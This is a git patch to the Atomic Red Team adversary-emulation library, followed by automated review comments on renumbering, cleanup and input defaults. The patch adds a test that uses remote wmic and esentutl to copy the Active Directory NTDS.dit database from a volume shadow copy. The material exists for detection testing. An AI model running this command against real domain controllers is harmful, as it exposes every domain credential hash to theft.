From 4f16aad6f9dfb0be6c0706b7314339201efd20ce Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 9 Feb 2022 15:14:59 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 5 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 5 +- atomics/Indexes/Indexes-Markdown/index.md | 5 +- .../Indexes/Indexes-Markdown/windows-index.md | 5 +- atomics/Indexes/index.yaml | 39 +++++++++++++ atomics/T1003.003/T1003.003.md | 58 +++++++++++++++++-- 6 files changed, 105 insertions(+), 12 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 2816134b..4e1e429f 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -70,8 +70,9 @@ credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c623714 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt -credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell -credential-access,T1003.003,NTDS,7,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt +credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt +credential-access,T1003.003,NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell +credential-access,T1003.003,NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 8af9c350..7adb63e8 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -50,8 +50,9 @@ credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c623714 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt -credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell -credential-access,T1003.003,NTDS,7,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt +credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt +credential-access,T1003.003,NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell +credential-access,T1003.003,NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index ba0c1d26..485ad2cf 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md 
@@ -103,8 +103,9 @@ - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows] - Atomic Test #4: Create Volume Shadow Copy with WMI [windows] - Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows] - - Atomic Test #6: Create Volume Shadow Copy with Powershell [windows] - - Atomic Test #7: Create Symlink to Volume Shadow Copy [windows] + - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] + - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows] + - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows] - T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 67f8c56b..f9559a4b 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -78,8 +78,9 @@ - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows] - Atomic Test #4: Create Volume Shadow Copy with WMI [windows] - Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows] - - Atomic Test #6: Create Volume Shadow Copy with Powershell [windows] - - Atomic Test #7: Create Symlink to Volume Shadow Copy [windows] + - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] + - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows] + - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #3: Packet Capture Windows Command Prompt [windows] - Atomic Test #4: Windows Internal Packet Capture [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 26fd893d..5ca6a17f 100644 --- a/atomics/Indexes/index.yaml 
+++ b/atomics/Indexes/index.yaml @@ -4401,6 +4401,45 @@ credential-access: executor: command: 'wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter} +' + name: command_prompt + elevation_required: true + - name: Create Volume Shadow Copy remotely (WMI) with esentutl + auto_generated_guid: 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865 + description: | + This test is intended to be run from a remote workstation with domain admin context. + The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl. + supported_platforms: + - windows + input_arguments: + source_path: + description: File to shadow copy + type: String + default: c:\windows\ntds\ntds.dit + target_path: + description: Target path of the result file + type: String + default: c:\ntds.dit + target_host: + description: IP Address / Hostname you want to target + type: String + default: localhost + dependencies: + - description: 'Target must be a reachable Domain Controller, and current context + must be domain admin + +' + prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief + +' + get_prereq_command: 'echo Sorry, can''t connect to target host, check: network, + firewall or permissions (must be admin on target) + +' + executor: + command: 'wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe + /y /vss #{source_path} /d #{target_path}" + ' name: command_prompt elevation_required: true diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md index 538f34a2..25aa64db 100644 --- a/atomics/T1003.003/T1003.003.md +++ b/atomics/T1003.003/T1003.003.md 
@@ -24,9 +24,11 @@ The following tools and techniques can be used to enumerate the NTDS file and th - [Atomic Test #5 - Create Volume Shadow Copy remotely with WMI](#atomic-test-5---create-volume-shadow-copy-remotely-with-wmi) -- [Atomic Test #6 - Create Volume Shadow Copy with Powershell](#atomic-test-6---create-volume-shadow-copy-with-powershell) +- [Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl](#atomic-test-6---create-volume-shadow-copy-remotely-wmi-with-esentutl) -- [Atomic Test #7 - Create Symlink to Volume Shadow Copy](#atomic-test-7---create-symlink-to-volume-shadow-copy) +- [Atomic Test #7 - Create Volume Shadow Copy with Powershell](#atomic-test-7---create-volume-shadow-copy-with-powershell) + +- [Atomic Test #8 - Create Symlink to Volume Shadow Copy](#atomic-test-8---create-symlink-to-volume-shadow-copy)
@@ -306,7 +308,55 @@ echo Sorry, can't connect to target host, check: network, firewall or permission

-## Atomic Test #6 - Create Volume Shadow Copy with Powershell +## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl +This test is intended to be run from a remote workstation with domain admin context. +The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| source_path | File to shadow copy | String | c:\windows\ntds\ntds.dit| +| target_path | Target path of the result file | String | c:\ntds.dit| +| target_host | IP Address / Hostname you want to target | String | localhost| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}" +``` + + + + +#### Dependencies: Run with `command_prompt`! +##### Description: Target must be a reachable Domain Controller, and current context must be domain admin +##### Check Prereq Commands: +```cmd +wmic /node:"#{target_host}" shadowcopy list brief +``` +##### Get Prereq Commands: +```cmd +echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target) +``` + + + + +
+
+ +## Atomic Test #7 - Create Volume Shadow Copy with Powershell This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. @@ -341,7 +391,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume

-## Atomic Test #7 - Create Symlink to Volume Shadow Copy +## Atomic Test #8 - Create Symlink to Volume Shadow Copy This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.
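Review bot: inserting the esentutl test as #6 in the atomics/Indexes/Indexes-CSV/index.csv hunk (@@ -70,8 +70,9) shifts the existing PowerShell and symlink tests from 6 and 7 to 7 and 8, so any runner configuration or detection-validation script that selects these tests by number will now execute a different test than it did before this commit. Consider appending the new test as #8 to keep existing numbers stable, or at least call the renumbering out in the release notes; the auto_generated_guid values of the moved rows (542bb97e-da53-436b-8e43-e0a7d31a6c24 and 21748c28-2793-4284-9e07-d6d028b66702) are unchanged and remain the safe key for consumers to reference.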
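Review bot: the added entry in the atomics/Indexes/index.yaml hunk (@@ -4401,6 +4401,45) has no cleanup_command, so after the executor runs, a copy of the Active Directory database sits at the target_path default c:\ntds.dit on the target host until someone deletes it by hand; a test that produces credential material should remove its own artifact and the description should tell the operator the file is left behind. Two smaller points on the same entry: `wmic /node:"#{target_host}" process call create` returns once cmd.exe has been spawned, so a successful call does not mean esentutl finished the copy, and the prereq_command `wmic /node:"#{target_host}" shadowcopy list brief` only verifies that WMI is reachable, not that esentutl.exe exists on the target or that the caller holds domain admin as the dependency description asserts.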
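Review bot: the table-of-contents hunk in atomics/T1003.003/T1003.003.md (@@ -24,9 +24,11) changes the heading anchors of both existing tests: #atomic-test-6---create-volume-shadow-copy-with-powershell becomes #atomic-test-7---create-volume-shadow-copy-with-powershell and #atomic-test-7---create-symlink-to-volume-shadow-copy becomes #atomic-test-8---create-symlink-to-volume-shadow-copy, so neither of the old anchors resolves any more and existing deep links from detection write-ups or internal playbooks into this file will break. This is a direct consequence of inserting in the middle of the list; appending the new test would have left the existing anchors intact.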
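Review bot: in the new "Atomic Test #6" section of atomics/T1003.003/T1003.003.md (@@ -306,7 +308,55), the description says the test "is intended to be run from a remote workstation with domain admin context", yet the target_host default in the Inputs table is localhost, so a run with defaults executes against the local machine and the dependency check passes wherever local WMI works. Either default target_host to a value the operator must replace, or state in the description that localhost is only meaningful when the test is run on the Domain Controller itself. The Inputs table should also say that target_path is written on the target host, not on the workstation issuing the command, since esentutl runs inside the cmd.exe created remotely, and the generated markdown mirrors the YAML in having no cleanup section for #{target_path}.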